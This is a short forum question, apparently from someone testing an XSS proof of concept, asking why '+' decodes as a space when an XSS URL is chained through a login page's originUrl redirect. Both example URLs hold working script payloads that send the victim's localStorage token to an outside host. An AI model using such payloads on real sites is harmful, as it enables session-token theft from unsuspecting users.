28Mar
+ is decoded by the browser as space [closed]
I am trying to poc and XSS in the url, and I have it working fine with the below url:
https://example.com:15000/test/%3Cscript%20type=%22text/javascript%22%3Edocument.location=%22http://192.168.1.88:8080/%3fc=%22+localStorage.getItem(%22token%22);%3C/script%3E
Now I wanted to go further with this poc, and craft a url that lets the end user access the login page and then gets redirected to the infected url, so I crafted the below url:
https://example:15000/login/?originUrl=https://example:15000/test/%3Cscript%20type=%22text/javascript%22%3Edocument.location=%22http://10.36.57.10:8080/%253fc=%22+localStorage.getItem(%22token%22);%3C/script%3E&client_id=ui-client
When I hit this in the browser, and intercept the call through burp, the + before the localstorage is being decoded as space!
I also tried to encode the +, but it is still decoded as a white space.
Noting that the first link is working fine and the + is not decoded as white space, why am I getting this issue when I use the second link?
